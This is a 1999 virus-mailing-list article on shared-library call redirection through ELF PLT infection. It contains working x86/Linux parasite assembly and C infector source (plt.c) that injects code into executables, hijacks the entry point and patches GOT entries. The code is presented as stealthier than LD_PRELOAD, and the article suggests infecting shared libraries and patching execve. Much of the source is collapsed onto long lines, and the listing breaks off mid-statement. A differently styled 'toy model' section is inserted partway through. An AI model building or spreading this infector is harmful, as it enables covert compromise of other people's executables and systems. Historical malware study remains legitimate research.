SHARED LIBRARY CALL REDIRECTION USING ELF PLT INFECTION

- Silvio Cesare
- The Unix Virus Mailing List
- http://virus.beergrave.net
- November 1999

INTRODUCTION

This article describes a method of shared library call redirection using ELF
infection that redirects the Procedure Linkage Table (PLT) of an executable.
Thus, the redirection is not resident outside of the infected executable. This
has an advantage over the LD_PRELOAD redirection technique in that no
environment variables are modified, so it remains more hidden than previous
techniques. An implementation is provided for x86/Linux.

THE PROCEDURE LINKAGE TABLE (PLT)

From the ELF specifications... (not necessary to read, but gives more detail
than the text that follows)

"
Procedure Linkage Table

Much as the global offset table redirects position-independent address
calculations to absolute locations, the procedure linkage table redirects
position-independent function calls to absolute locations. The link editor
cannot resolve execution transfers (such as function calls) from one
executable or shared object to another. Consequently, the link editor arranges
to have the program transfer control to entries in the procedure linkage
table. On the SYSTEM V architecture, procedure linkage tables reside in shared
text, but they use addresses in the private global offset table. The dynamic
linker determines the destinations' absolute addresses and modifies the global
offset table's memory image accordingly. The dynamic linker thus can redirect
the entries without compromising the position-independence and sharability of
the program's text. Executable files and shared object files have separate
procedure linkage tables.

+ Figure 2-12: Absolute Procedure Linkage Table {*}

    .PLT0:pushl   got_plus_4
          jmp     *got_plus_8
          nop; nop
          nop; nop
    .PLT1:jmp     *name1_in_GOT
          pushl   $offset
          jmp     .PLT0@PC
    .PLT2:jmp     *name2_in_GOT
          pushl   $offset
          jmp     .PLT0@PC
          ...

+ Figure 2-13: Position-Independent Procedure Linkage Table

    .PLT0:pushl   4(%ebx)
          jmp     *8(%ebx)
          nop; nop
          nop; nop
    .PLT1:jmp     *name1@GOT(%ebx)
          pushl   $offset
          jmp     .PLT0@PC
    .PLT2:jmp     *name2@GOT(%ebx)
          pushl   $offset
          jmp     .PLT0@PC
          ...

NOTE: As the figures show, the procedure linkage table instructions use
different operand addressing modes for absolute code and for
position-independent code. Nonetheless, their interfaces to the dynamic linker
are the same.

Following the steps below, the dynamic linker and the program ``cooperate'' to
resolve symbolic references through the procedure linkage table and the global
offset table.

1. When first creating the memory image of the program, the dynamic linker
   sets the second and the third entries in the global offset table to special
   values. Steps below explain more about these values.

2. If the procedure linkage table is position-independent, the address of the
   global offset table must reside in %ebx. Each shared object file in the
   process image has its own procedure linkage table, and control transfers to
   a procedure linkage table entry only from within the same object file.
   Consequently, the calling function is responsible for setting the global
   offset table base register before calling the procedure linkage table
   entry.

3. For illustration, assume the program calls name1, which transfers control
   to the label .PLT1.

4. The first instruction jumps to the address in the global offset table entry
   for name1. Initially, the global offset table holds the address of the
   following pushl instruction, not the real address of name1.

5. Consequently, the program pushes a relocation offset (offset) on the stack.
   The relocation offset is a 32-bit, non-negative byte offset into the
   relocation table. The designated relocation entry will have type
   R_386_JMP_SLOT, and its offset will specify the global offset table entry
   used in the previous jmp instruction.
   The relocation entry also contains a symbol table index, thus telling the
   dynamic linker what symbol is being referenced, name1 in this case.

6. After pushing the relocation offset, the program then jumps to .PLT0, the
   first entry in the procedure linkage table. The pushl instruction places
   the value of the second global offset table entry (got_plus_4 or 4(%ebx))
   on the stack, thus giving the dynamic linker one word of identifying
   information. The program then jumps to the address in the third global
   offset table entry (got_plus_8 or 8(%ebx)), which transfers control to the
   dynamic linker.

7. When the dynamic linker receives control, it unwinds the stack, looks at
   the designated relocation entry, finds the symbol's value, stores the
   ``real'' address for name1 in its global offset table entry, and transfers
   control to the desired destination.

8. Subsequent executions of the procedure linkage table entry will transfer
   directly to name1, without calling the dynamic linker a second time. That
   is, the jmp instruction at .PLT1 will transfer to name1, instead of
   ``falling through'' to the pushl instruction.

The LD_BIND_NOW environment variable can change dynamic linking behavior. If
its value is non-null, the dynamic linker evaluates procedure linkage table
entries before transferring control to the program. That is, the dynamic
linker processes relocation entries of type R_386_JMP_SLOT during process
initialization. Otherwise, the dynamic linker evaluates procedure linkage
table entries lazily, delaying symbol resolution and relocation until the
first execution of a table entry.

NOTE: Lazy binding generally improves overall application performance, because
unused symbols do not incur the dynamic linking overhead. Nevertheless, two
situations make lazy binding undesirable for some applications. First, the
initial reference to a shared object function takes longer than subsequent
calls, because the dynamic linker intercepts the call to resolve the symbol.
Some applications cannot tolerate this unpredictability. Second, if an error
occurs and the dynamic linker cannot resolve the symbol, the dynamic linker
will terminate the program. Under lazy binding, this might occur at arbitrary
times. Once again, some applications cannot tolerate this unpredictability. By
turning off lazy binding, the dynamic linker forces the failure to occur
during process initialization, before the application receives control.
"

To explain in more detail...

Shared library calls are treated specially in executable objects because they
cannot be linked into the executable at compile time: shared libraries are not
available to the executable until runtime. The PLT was designed to handle such
cases. The PLT holds the code responsible for calling the dynamic linker to
locate the desired routines.

Instead of calling the real shared library routine directly, the executable
calls an entry in the PLT. It is then up to the PLT to resolve the symbol it
represents and do the right thing.

From the ELF specifications...

"
    .PLT1:jmp     *name1_in_GOT
          pushl   $offset
          jmp     .PLT0@PC
"

This is the important part. This is the routine called instead of the library
call. name1_in_GOT initially points to the following pushl instruction. The
offset is a relocation offset (see the ELF specifications) whose relocation
entry references the symbol the library call represents. It is used after the
final jmp, which jumps (via .PLT0) to the dynamic linker. The dynamic linker
then changes name1_in_GOT to point directly to the routine, thus avoiding
dynamic linking a second time.

This summarizes the importance of the PLT in library lookups. Note that we can
change name1_in_GOT to point to our own code, thus replacing library calls. If
we save the state of the GOT before replacing it, we can still call the old
library routine and thus redirect any library call.
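
To make the mechanics above concrete, here is a small toy model in plain C. It
is not the real dynamic linker and not the sample code from this article: a
single function pointer (toy_got_slot) stands in for name1_in_GOT,
toy_lazy_stub stands in for the pushl/jmp .PLT0 path into the dynamic linker,
and toy_hook follows the save/replace idea just described. All toy_* names are
assumptions made up for this illustration.

```c
#include <assert.h>
#include <string.h>

/* Toy model only: every name below is hypothetical, and nothing here
   touches a real PLT or GOT. */
typedef int (*toy_fn)(const char *);

int toy_resolver_calls = 0;	/* times the pretend dynamic linker ran */
int toy_hook_calls = 0;		/* times the replacement routine ran */

/* stands in for the real shared library routine */
int toy_real(const char *s)
{
	return (int)strlen(s);
}

int toy_lazy_stub(const char *s);

/* stands in for name1_in_GOT: initially leads into the resolver path */
toy_fn toy_got_slot = toy_lazy_stub;

/* stands in for "pushl $offset; jmp .PLT0": resolve, patch the slot, call */
int toy_lazy_stub(const char *s)
{
	toy_resolver_calls++;
	toy_got_slot = toy_real;
	return toy_got_slot(s);
}

/* stands in for .PLT1: "jmp *name1_in_GOT" */
int toy_plt_call(const char *s)
{
	return toy_got_slot(s);
}

toy_fn toy_saved_slot;		/* saved state of the slot */

/* replacement routine: restore, call the original, save again, re-install */
int toy_hook(const char *s)
{
	int ret;

	toy_hook_calls++;
	toy_got_slot = toy_saved_slot;
	ret = toy_plt_call(s);
	toy_saved_slot = toy_got_slot;	/* the resolver may have patched it */
	toy_got_slot = toy_hook;
	return ret;
}

void toy_install_hook(void)
{
	assert(toy_got_slot != toy_hook);	/* do not install twice */
	toy_saved_slot = toy_got_slot;
	toy_got_slot = toy_hook;
}
```

In this model, calling toy_install_hook() and then toy_plt_call() twice runs
toy_hook twice but the pretend resolver only once, which mirrors steps 7 and 8
of the specification: after the first call the slot holds the resolved
address, so the saved copy has to be refreshed after every call through it.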

ELF INFECTION

Injecting a redirected library call into an executable requires new code to
be added to that executable. The actual procedure for ELF infection will not
be described here as it has been covered very well in previous articles
(http://www.big.net.au/~silvio - Unix Viruses/Unix ELF Parasites and Virus).

PLT REDIRECTION

The algorithm at the entry point code is as follows...

	* mark the text segment writable
	* save the PLT(GOT) entry
	* replace the PLT(GOT) entry with the address of the new lib call

The algorithm in the new library call is as follows...

	* do the payload of the new lib call
	* restore the original PLT(GOT) entry
	* call the lib call
	* save the PLT(GOT) entry again (if it's changed)
	* replace the PLT(GOT) entry with the address of the new lib call

GOT ADDRESS

To find the address of the GOT entry for a given function, one must work
backwards from the .rel.plt section, as explained in the above information on
the PLT: look up the function's index in the dynamic symbol table, then find
the .rel.plt relocation that references that index. Its r_offset is the
address of the GOT entry.

/* return the index of sh_function in the dynamic symbol table, or -1 */
int do_dyn_symtab(
	int fd,
	Elf32_Shdr *shdr, Elf32_Shdr *shdrp,
	const char *sh_function
)
{
	Elf32_Shdr *strtabhdr = &shdr[shdrp->sh_link];
	char *string;
	Elf32_Sym *sym, *symp;
	int i;

	/* load the string table linked to the dynamic symbol table */
	string = (char *)malloc(strtabhdr->sh_size);
	if (string == NULL) {
		perror("malloc");
		exit(1);
	}

	if (lseek(
		fd, strtabhdr->sh_offset, SEEK_SET) != strtabhdr->sh_offset
	) {
		perror("lseek");
		exit(1);
	}

	if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) {
		perror("read");
		exit(1);
	}

	/* load the dynamic symbol table itself */
	sym = (Elf32_Sym *)malloc(shdrp->sh_size);
	if (sym == NULL) {
		perror("malloc");
		exit(1);
	}

	if (lseek(fd, shdrp->sh_offset, SEEK_SET) != shdrp->sh_offset) {
		perror("lseek");
		exit(1);
	}

	if (read(fd, sym, shdrp->sh_size) != shdrp->sh_size) {
		perror("read");
		exit(1);
	}

	symp = sym;

	for (i = 0; i < shdrp->sh_size; i += sizeof(Elf32_Sym)) {
		if (!strcmp(&string[symp->st_name], sh_function)) {
			int index = symp - sym;

			free(string);
			free(sym);
			return index;
		}

		++symp;
	}

	free(string);
	free(sym);
	return -1;
}

int get_sym_number(
	int fd, Elf32_Ehdr *ehdr, Elf32_Shdr *shdr, const char *sh_function
)
{
	Elf32_Shdr *shdrp = shdr;
	int i;

	for (i = 0; i <
ehdr->e_shnum; i++) {
		if (shdrp->sh_type == SHT_DYNSYM) {
			return do_dyn_symtab(fd, shdr, shdrp, sh_function);
		}

		++shdrp;
	}

	/* no dynamic symbol table in this file */
	return -1;
}

/* return the r_offset of the relocation that references symbol index sym */
int do_rel(int fd, Elf32_Shdr *shdr, int sym)
{
	Elf32_Rel *rel, *relp;
	int i;

	rel = (Elf32_Rel *)malloc(shdr->sh_size);
	if (rel == NULL) {
		perror("malloc");
		exit(1);
	}

	if (lseek(fd, shdr->sh_offset, SEEK_SET) != shdr->sh_offset) {
		perror("lseek");
		exit(1);
	}

	if (read(fd, rel, shdr->sh_size) != shdr->sh_size) {
		perror("read");
		exit(1);
	}

	relp = rel;

	for (i = 0; i < shdr->sh_size; i += sizeof(Elf32_Rel)) {
		if (ELF32_R_SYM(relp->r_info) == sym) {
			int offset = relp->r_offset;

			free(rel);
			return offset;
		}

		++relp;
	}

	free(rel);
	return -1;
}

int find_rel(
	int fd,
	const char *string,
	Elf32_Ehdr *ehdr, Elf32_Shdr *shdr,
	const char *sh_function
)
{
	Elf32_Shdr *shdrp = shdr;
	int sym;
	int i;

	sym = get_sym_number(fd, ehdr, shdr, sh_function);
	if (sym < 0) {
		return -1;
	}

	for (i = 0; i < ehdr->e_shnum; i++) {
		if (!strcmp(&string[shdrp->sh_name], ".rel.plt")) {
			return do_rel(fd, shdrp, sym);
		}

		++shdrp;
	}

	return -1;
}

PLT REDIRECTION

To explain in more detail how PLT redirection is done, the simplest method is
to describe the sample code supplied; comments are marked with a hash sign
(#). This code is injected into an executable and becomes the new entry point
of the program. The library call that is redirected is puts (the function name
the sample passes to the infector); the new code prints a message before the
string supplied to puts.

--
#
# This routine is used for chaining a virus. That is to keep the entry point
# the same but append new code to the host.
# void virchfunc(void) { __asm__(" .globl virchstart .type virchstart,@function virchstart: call virchmain virchmain: popl %esi # addl $(virchdata - virchmain),%esi # movl $virdata,%esi movl data_entry_point - virchdata(%esi),%edi # movl data_entry_point,%edi jmp *%edi .globl virchdata .type virchdata,@function virchdata: .globl data_entry_point .size data_entry_point,4 .type data_entry_point,@object data_entry_point: .long 0 .globl virchend .type virchend,@function virchend: "); } # # This is the heart of the parasite # void virfunc(void) { __asm__(" .globl L1 .type virstart,@function virstart: # # save the registers. esi and edi arent used on startup so we can ignore them # pushl %eax pushl %ebx pushl %ecx pushl %edx # # dynamically determine the address of the virus data # call virmain virmain: popl %esi # addl $(virdata - virmain),%esi # movl $virdata,%esi # # we save the address of the original PLT reference to be later used. This # will be the address of the following instruction in the actual PLT # movl plt_addr - virdata(%esi),%ebx # movl (%ebx),%ecx # movl %ecx,orig_plt_addr - virdata(%esi) # movl plt_addr,orig_plt_addr # # we copy our new procedure to the GOT (from the PLT). # movl %esi,%ebx # subl $(virdata - plt_puts),%ebx # movl plt_addr - virdata(%esi),%ecx # movl %ebx,(%ecx) # movl $plt_puts,plt_addr # # This is part of the chaining routine. we mark the entry point segment # writeable and copy back the original data # movl $125,%eax movl orig_entry_point - virdata(%esi),%ebx movl %ebx,%edi # for later andl $~4095,%ebx movl $8192,%ecx movl $7,%edx int $0x80 pushl %edi leal store - virdata(%esi),%esi movl $(virchend - virchstart),%ecx rep movsb popl %edi # # restore the registers (remember esi and edi arent used) # popl %edx popl %ecx popl %ebx popl %eax # # jump back to the entry point # jmp *%edi # # this routine is used by orig_plt_func to obtain the address of the virus # data. so we can modify saved plt info. 
# .globl getvirdata .type getvirdata,@function getvirdata: pushl %ebp movl %esp,%ebp call getvirdatamain getvirdatamain: popl %eax # addl $(virdata - getvirdatamain),%eax # movl $virdata,%eax movl %ebp,%esp popl %ebp ret .globl virdata .type virdata,@function virdata: .globl orig_entry_point .size orig_entry_point,4 .type orig_entry_point,@object orig_entry_point: .long 0 .globl orig_plt_addr .size orig_plt_addr,4 .type orig_plt_addr,@object orig_plt_addr: .long 0 .globl plt_addr .size plt_addr,4 .type plt_addr,@object plt_addr: .long 0 .globl store .type store,@object .size store,virchend- virchstart store: .zero virchend - virchstart .globl virend .type virend,@function virend: "); /* we have a little wasted space here from cleaning up the stack frame in the wrapper function. */ } # # position independant data # char *get_msg(void) { __asm__(" call msgmain msgmain: popl %eax addl $(msgdata - msgmain),%eax jmp msgend msgdata: .ascii \"Hello \" msgend: "); } int orig_plt_func(char *s) { long *data = getvirdata(); int (*f)(char *); int ret; # # we copy the original PLT(GOT) address back to the PLT(GOT) so we can call # the original function. in this case 'puts' (or perhaps the dynamic linker) # f = (void *)(*(long *)data[PLT_ADDR] = data[ORIG_PLT_ADDR]); # # call the original function # ret = f(s); # # the PLT may have changed now, so we save it again. remember that if lazy # linking is used, the dynamic linker may change the PLT to point directly at # the shared lib call instead of calling the dynamic linker again # data[ORIG_PLT_ADDR] = *(long *)data[PLT_ADDR]; /* the following line doesnt compile very nicely as it doesnt shortcut the subtraction */ # # change the PLT back to call the new 'puts' call # *(long *)data[PLT_ADDR] = (long)&((char *)data)[ (long)plt_puts - (long)virdata ]; return ret; } # # this is the new 'puts' function. this can be anything, but remember, it # has to be position independant. which means if you cant use libc or absolute # information. 
#
int plt_puts(char *s)
{
	_write(1, get_msg(), 6);
	return orig_plt_func(s);
}

#
# the end of the virus
#
void virendall(void)
{
}

-- snip

FUTURE DIRECTIONS

It is possible to infect a shared library directly, and this is sometimes more
desirable because the redirection stays resident for all executables that use
the library. An even stealthier version of the PLT redirection described here
is also possible: modify the process image directly, so that the host
executable stays unmodified. This, however, has the disadvantage that the
redirection stays active only for the life of a single process, but if the
system call execve is patched, the redirection can be restarted on each
execution.

CONCLUSION

This article has described a method of redirecting shared library calls in an
executable by directly modifying the PLT of the executable in question using
ELF infection techniques. It is stealthier than previous techniques using
LD_PRELOAD, as no environment variables are modified, and it can be applied to
any library call the host makes.

-- plt.c (MUST be compiled with -O2)

/* header names were lost in this copy; reconstructed from the calls used */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <elf.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <asm/unistd.h>

/* word indices into the data block at virdata (orig_entry_point is 0) */
#define ORIG_PLT_ADDR	1
#define PLT_ADDR	2

#define VIRUS_LENGTH	(virendall - virstart)
#define CHAIN_LENGTH	(virchend - virchstart)

#define PAGE_SIZE	4096
#define PAGE_MASK	(PAGE_SIZE - 1)

#define DEBUG_STRING	".data1"

extern long orig_entry_point;
extern long orig_plt_addr;
extern long plt_addr;
extern long data_entry_point;
extern char *store;

void virstart(void);
void virend(void);
void virchstart(void);
void virchend(void);
void virchdata(void);
void virdata(void);
long *getvirdata(void);
int plt_puts(char *s);

typedef struct {
	Elf32_Ehdr	ehdr;
	Elf32_Phdr*	phdr;
	Elf32_Shdr*	shdr;
	int		plen;
	char**		section;
	char*		string;
	int		bss;
} bin_t;

#define __syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
	: "=a" (__res) \
	: "0" (__NR##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
	  "d" ((long)(arg3))); \
return (type)
__res; \ } static inline __syscall3(int,_write,int,fd,const void *,buf,int,size); void virchfunc(void) { __asm__(" .globl virchstart .type virchstart,@function virchstart: call virchmain virchmain: popl %esi # addl $(virchdata - virchmain),%esi # movl $virdata,%esi movl data_entry_point - virchdata(%esi),%edi # movl data_entry_point,%edi jmp *%edi .globl virchdata .type virchdata,@function virchdata: .globl data_entry_point .size data_entry_point,4 .type data_entry_point,@object data_entry_point: .long 0 .globl virchend .type virchend,@function virchend: "); } void virfunc(void) { __asm__(" .globl L1 .type virstart,@function virstart: pushl %eax pushl %ebx pushl %ecx pushl %edx call virmain virmain: popl %esi # addl $(virdata - virmain),%esi # movl $virdata,%esi movl plt_addr - virdata(%esi),%ebx # movl (%ebx),%ecx # movl %ecx,orig_plt_addr - virdata(%esi) # movl plt_addr,orig_plt_addr movl %esi,%ebx # subl $(virdata - plt_puts),%ebx # movl plt_addr - virdata(%esi),%ecx # movl %ebx,(%ecx) # movl $plt_puts,plt_addr movl $125,%eax movl orig_entry_point - virdata(%esi),%ebx movl %ebx,%edi # for later andl $~4095,%ebx movl $8192,%ecx movl $7,%edx int $0x80 pushl %edi leal store - virdata(%esi),%esi movl $(virchend - virchstart),%ecx rep movsb popl %edi popl %edx popl %ecx popl %ebx popl %eax jmp *%edi .globl getvirdata .type getvirdata,@function getvirdata: pushl %ebp movl %esp,%ebp call getvirdatamain getvirdatamain: popl %eax # addl $(virdata - getvirdatamain),%eax # movl $virdata,%eax movl %ebp,%esp popl %ebp ret .globl virdata .type virdata,@function virdata: .globl orig_entry_point .size orig_entry_point,4 .type orig_entry_point,@object orig_entry_point: .long 0 .globl orig_plt_addr .size orig_plt_addr,4 .type orig_plt_addr,@object orig_plt_addr: .long 0 .globl plt_addr .size plt_addr,4 .type plt_addr,@object plt_addr: .long 0 .globl store .type store,@object .size store,virchend- virchstart store: .zero virchend - virchstart .globl virend .type virend,@function 
virend: "); /* we have a little wasted space here from cleaning up the stack frame in the wrapper function. */ } char *get_msg(void) { __asm__(" call msgmain msgmain: popl %eax addl $(msgdata - msgmain),%eax jmp msgend msgdata: .ascii \"Hello \" msgend: "); } int orig_plt_func(char *s) { long *data = getvirdata(); int (*f)(char *); int ret; f = (void *)(*(long *)data[PLT_ADDR] = data[ORIG_PLT_ADDR]); ret = f(s); data[ORIG_PLT_ADDR] = *(long *)data[PLT_ADDR]; /* the following line doesnt compile very nicely as it doesnt shortcut the subtraction */ *(long *)data[PLT_ADDR] = (long)&((char *)data)[ (long)plt_puts - (long)virdata ]; return ret; } int plt_puts(char *s) { _write(1, get_msg(), 6); return orig_plt_func(s); } void virendall(void) { } char *get_virus(void) { return (char *)virstart; } int init_virus( int plt, int text_start, int data_start, int data_memsz, int entry, bin_t *bin ) { int code_start = data_start + data_memsz; int i; if (mprotect( (void *)((long)virstart & (~PAGE_MASK)), PAGE_SIZE << 1, PROT_READ | PROT_WRITE ) < 0) { perror("mprotect"); exit(1); } if (mprotect( (void *)((long)virchstart & (~PAGE_MASK)), PAGE_SIZE << 1, PROT_READ | PROT_WRITE ) < 0) { perror("mprotect"); exit(1); } data_entry_point = code_start; orig_entry_point = entry; plt_addr = plt; for (i = 0; i < bin->bss; i++) { long vaddr = bin->shdr[i].sh_addr; if (entry >= vaddr && entry < (vaddr + bin->shdr[i].sh_size)) { char *p = &bin->section[i][entry - vaddr]; memcpy(&store, p, CHAIN_LENGTH); memcpy(p, virchstart, CHAIN_LENGTH); break; } } return 0; } void do_elf_checks(Elf32_Ehdr *ehdr) { if (strncmp(ehdr->e_ident, ELFMAG, SELFMAG)) { fprintf(stderr, "File not ELF\n"); exit(1); } if (ehdr->e_type != ET_EXEC) { fprintf(stderr, "ELF type not ET_EXEC or ET_DYN\n"); exit(1); } if (ehdr->e_machine != EM_386 && ehdr->e_machine != EM_486) { fprintf(stderr, "ELF machine type not EM_386 or EM_486\n"); exit(1); } if (ehdr->e_version != EV_CURRENT) { fprintf(stderr, "ELF version not 
current\n");
		exit(1);
	}
}

/* return the index of sh_function in the dynamic symbol table, or -1 */
int do_dyn_symtab(
	int fd,
	Elf32_Shdr *shdr, Elf32_Shdr *shdrp,
	const char *sh_function
)
{
	Elf32_Shdr *strtabhdr = &shdr[shdrp->sh_link];
	char *string;
	Elf32_Sym *sym, *symp;
	int i;

	/* load the string table linked to the dynamic symbol table */
	string = (char *)malloc(strtabhdr->sh_size);
	if (string == NULL) {
		perror("malloc");
		exit(1);
	}

	if (lseek(
		fd, strtabhdr->sh_offset, SEEK_SET) != strtabhdr->sh_offset
	) {
		perror("lseek");
		exit(1);
	}

	if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) {
		perror("read");
		exit(1);
	}

	/* load the dynamic symbol table itself */
	sym = (Elf32_Sym *)malloc(shdrp->sh_size);
	if (sym == NULL) {
		perror("malloc");
		exit(1);
	}

	if (lseek(fd, shdrp->sh_offset, SEEK_SET) != shdrp->sh_offset) {
		perror("lseek");
		exit(1);
	}

	if (read(fd, sym, shdrp->sh_size) != shdrp->sh_size) {
		perror("read");
		exit(1);
	}

	symp = sym;

	for (i = 0; i < shdrp->sh_size; i += sizeof(Elf32_Sym)) {
		if (!strcmp(&string[symp->st_name], sh_function)) {
			int index = symp - sym;

			free(string);
			free(sym);
			return index;
		}

		++symp;
	}

	free(string);
	free(sym);
	return -1;
}

int get_sym_number(
	int fd, Elf32_Ehdr *ehdr, Elf32_Shdr *shdr, const char *sh_function
)
{
	Elf32_Shdr *shdrp = shdr;
	int i;

	for (i = 0; i < ehdr->e_shnum; i++) {
		if (shdrp->sh_type == SHT_DYNSYM) {
			return do_dyn_symtab(fd, shdr, shdrp, sh_function);
		}

		++shdrp;
	}

	/* no dynamic symbol table in this file */
	return -1;
}

/* return the r_offset of the relocation that references symbol index sym */
int do_rel(int fd, Elf32_Shdr *shdr, int sym)
{
	Elf32_Rel *rel, *relp;
	int i;

	rel = (Elf32_Rel *)malloc(shdr->sh_size);
	if (rel == NULL) {
		perror("malloc");
		exit(1);
	}

	if (lseek(fd, shdr->sh_offset, SEEK_SET) != shdr->sh_offset) {
		perror("lseek");
		exit(1);
	}

	if (read(fd, rel, shdr->sh_size) != shdr->sh_size) {
		perror("read");
		exit(1);
	}

	relp = rel;

	for (i = 0; i < shdr->sh_size; i += sizeof(Elf32_Rel)) {
		if (ELF32_R_SYM(relp->r_info) == sym) {
			int offset = relp->r_offset;

			free(rel);
			return offset;
		}

		++relp;
	}

	free(rel);
	return -1;
}

int find_rel(
	int fd,
	const char *string,
	Elf32_Ehdr *ehdr, Elf32_Shdr *shdr,
	const char *sh_function
)
{
	Elf32_Shdr *shdrp = shdr;
	int sym;
	int i;

	sym = get_sym_number(fd, ehdr, shdr, sh_function);
	if (sym < 0) {
		return -1;
	}

	for (i = 0; i < ehdr->e_shnum; i++) {
		if
(!strcmp(&string[shdrp->sh_name], ".rel.plt")) { return do_rel(fd, shdrp, sym); } ++shdrp; } return -1; } void load_section(char **section, int fd, Elf32_Shdr *shdr) { if (lseek(fd, shdr->sh_offset, SEEK_SET) < 0) { perror("lseek"); exit(1); } *section = (char *)malloc(shdr->sh_size); if (*section == NULL) { perror("malloc"); exit(1); } if (read(fd, *section, shdr->sh_size) != shdr->sh_size) { perror("read"); exit(1); } } int load_bin(int fd, bin_t *bin) { char **sectionp; Elf32_Ehdr *ehdr; Elf32_Shdr *shdr; int slen; Elf32_Shdr *strtabhdr; int i; ehdr = &bin->ehdr; if (read(fd, ehdr, sizeof(Elf32_Ehdr)) != sizeof(Elf32_Ehdr)) { perror("read"); exit(1); } do_elf_checks(ehdr); bin->phdr = (Elf32_Phdr *)malloc( bin->plen = sizeof(Elf32_Phdr)*ehdr->e_phnum ); if (bin->phdr == NULL) { perror("malloc"); exit(1); } /* read the phdr's */ if (lseek(fd, ehdr->e_phoff, SEEK_SET) < 0) { perror("lseek"); exit(1); } if (read(fd, bin->phdr, bin->plen) != bin->plen) { perror("read"); exit(1); } slen = sizeof(Elf32_Shdr)*ehdr->e_shnum; bin->shdr = (Elf32_Shdr *)malloc(slen); if (bin->shdr == NULL) { perror("malloc"); exit(1); } bin->section = (char **)malloc(sizeof(char **)*ehdr->e_shnum); if (bin->section == NULL) { perror("malloc"); exit(1); } if (lseek(fd, ehdr->e_shoff, SEEK_SET) < 0) { perror("lseek"); exit(1); } if (read(fd, bin->shdr, slen) != slen) { perror("read"); exit(1); } strtabhdr = &bin->shdr[ehdr->e_shstrndx]; bin->string = (char *)malloc(strtabhdr->sh_size); if (bin->string == NULL) { perror("malloc"); exit(1); } if (lseek( fd, strtabhdr->sh_offset, SEEK_SET ) != strtabhdr->sh_offset) { perror("lseek"); exit(1); } if (read(fd, bin->string, strtabhdr->sh_size) != strtabhdr->sh_size) { perror("read"); exit(1); } bin->bss = -1; for ( i = 0, sectionp = bin->section, shdr = bin->shdr; i < ehdr->e_shnum; i++, sectionp++ ) { if (shdr[i].sh_type == SHT_NOBITS) { bin->bss = i; } else { load_section(sectionp, fd, &shdr[i]); } } if (bin->bss < 0) { printf("No bss 
section\n"); exit(1); } return 0; } void infect_elf( char *host, char *(*get_virus)(void), int (*init_virus)(int, int, int, int, int, bin_t *), int len, const char *sh_function ) { Elf32_Phdr *phdr; Elf32_Shdr *shdr; int move = 0; int out, fd; int evaddr, text_start = -1, plt; int bss_len, addlen, addlen2, addlen3; int offset, pos, oshoff; int i; char null = 0; struct stat st_buf; char tempname[8] = "vXXXXXX"; bin_t bin; Elf32_Shdr newshdr; char *zero; fd = open(host, O_RDONLY); if (fd < 0) { perror("open"); exit(1); } /* read the ehdr */ load_bin(fd, &bin); plt = find_rel( fd, bin.string, &bin.ehdr, bin.shdr, sh_function ); if (plt < 0) { printf("No dynamic function: %s\n", sh_function); exit(1); } phdr = bin.phdr; for (i = 0; i < bin.ehdr.e_phnum; i++) { if (phdr->p_type == PT_LOAD) { if (phdr->p_offset == 0) { text_start = phdr->p_vaddr; } else { if (text_start < 0) { fprintf(stderr, "No text segment??\n"); exit(1); } /* is this the data segment ? */ offset = phdr->p_offset + phdr->p_filesz; bss_len = phdr->p_memsz - phdr->p_filesz; if (init_virus != NULL) init_virus( plt, text_start, phdr->p_vaddr, phdr->p_memsz, bin.ehdr.e_entry, &bin ); break; } } ++phdr; } addlen = len + bss_len; /* update the phdr's to reflect the extention of the data segment (to allow virus insertion) */ phdr = bin.phdr; for (i = 0; i < bin.ehdr.e_phnum; i++) { if (phdr->p_type != PT_DYNAMIC) { if (move) { phdr->p_offset += addlen; } else if (phdr->p_type == PT_LOAD && phdr->p_offset) { /* is this the data segment ? 
*/ phdr->p_filesz += addlen; phdr->p_memsz += addlen; move = 1; } } ++phdr; } /* update ehdr to reflect new offsets */ if (fstat(fd, &st_buf) < 0) { perror("fstat"); exit(1); } /* write the new virus */ if (mktemp(tempname) == NULL) { perror("mktemp"); exit(1); } out = open(tempname, O_WRONLY | O_CREAT | O_EXCL, st_buf.st_mode); if (out < 0) { perror("open"); exit(1); } addlen2 = addlen + sizeof(DEBUG_STRING); addlen3 = addlen2 + sizeof(Elf32_Shdr); bin.ehdr.e_shoff += addlen2; ++bin.ehdr.e_shstrndx; ++bin.ehdr.e_shnum; if (write(out, &bin.ehdr, sizeof(Elf32_Ehdr)) != sizeof(Elf32_Ehdr)) { perror("write"); goto cleanup; } --bin.ehdr.e_shnum; --bin.ehdr.e_shstrndx; if (write(out, bin.phdr, bin.plen) != bin.plen) { perror("write"); goto cleanup; } for (i = 0; i < bin.bss; i++) { if (lseek(out, bin.shdr[i].sh_offset, SEEK_SET) < 0) goto cleanup; if (write( out, bin.section[i], bin.shdr[i].sh_size ) != bin.shdr[i].sh_size) goto cleanup; } zero = (char *)malloc(bss_len); memset(zero, 0, bss_len); if (write(out, zero, bss_len) != bss_len) { perror("write"); goto cleanup; } if (write(out, get_virus(), len) != len) { perror("write"); goto cleanup; } for (i = bin.bss + 1; i <= bin.ehdr.e_shstrndx; i++) { if (lseek(out, addlen + bin.shdr[i].sh_offset, SEEK_SET) < 0) goto cleanup; if (write( out, bin.section[i], bin.shdr[i].sh_size ) != bin.shdr[i].sh_size) goto cleanup; } if (write( out, DEBUG_STRING, sizeof(DEBUG_STRING) ) != sizeof(DEBUG_STRING)) { perror("write"); goto cleanup; } if (lseek(out, bin.ehdr.e_shoff, SEEK_SET) < 0) goto cleanup; for (i = 0; i < bin.bss; i++) if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; newshdr.sh_name = bin.shdr[bin.ehdr.e_shstrndx].sh_size; newshdr.sh_type = SHT_PROGBITS; newshdr.sh_flags = SHF_ALLOC | SHF_WRITE; newshdr.sh_addr = bin.shdr[i].sh_addr; newshdr.sh_offset = offset; newshdr.sh_size = addlen; newshdr.sh_link = 0; newshdr.sh_info = 0; newshdr.sh_addralign = 0; newshdr.sh_entsize = 0; if 
